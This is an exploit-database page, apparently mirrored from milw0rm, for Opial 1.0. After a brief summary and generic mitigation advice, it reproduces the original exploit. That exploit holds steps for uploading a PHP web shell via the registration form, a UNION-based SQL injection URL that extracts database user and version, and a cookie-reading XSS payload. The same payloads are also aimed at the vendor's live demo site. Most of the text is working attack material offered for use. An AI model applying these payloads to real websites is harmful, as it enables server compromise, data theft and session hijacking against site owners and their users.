header-logo
Suggest Exploit
vendor:
Opial
by:
LMaster
5.5
CVSS
MEDIUM
Arbitrary File Upload, XSS, SQL Injection
CWE
Product Name: Opial
Affected Version From: Opial 1.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Opial 1.0 Arbitrary File Upload & XSS & SQL Injection (genres_parent)

This exploit allows an attacker to perform arbitrary file upload, XSS, and SQL injection attacks on the Opial 1.0 website.

Mitigation:

Implement input validation and sanitization to prevent arbitrary file uploads, XSS, and SQL injection attacks. Regularly update the software to patch any known vulnerabilities.
Source

Exploit-DB raw data:

::::::::::::::::::::R3AL.RU::::::::::::::::::::

Opial 1.0 Arbitrary File Upload & XSS & SQL Injection (genres_parent)

Author: LMaster

Greetz: r3al.ru

Official Site (with demo):

http://www.opial.com

-->Arbitrary File Upload<--

1. Go to http://www.site.com/register.php
2. Disable JavaScript
3. Upload shell as "User Image"
4. Register
5. Shell location: http://www.site.com/userimages/SHELL.PHP

-->SQL Injection<--

http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--

-->XSS<--

http://www.site.com/home.php?genres_parent="><script>alert(document.cookie);</script>

Demo:

http://www.opial.com/demo/register.php

http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--

http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

LMaster.

# milw0rm.com [2009-07-11]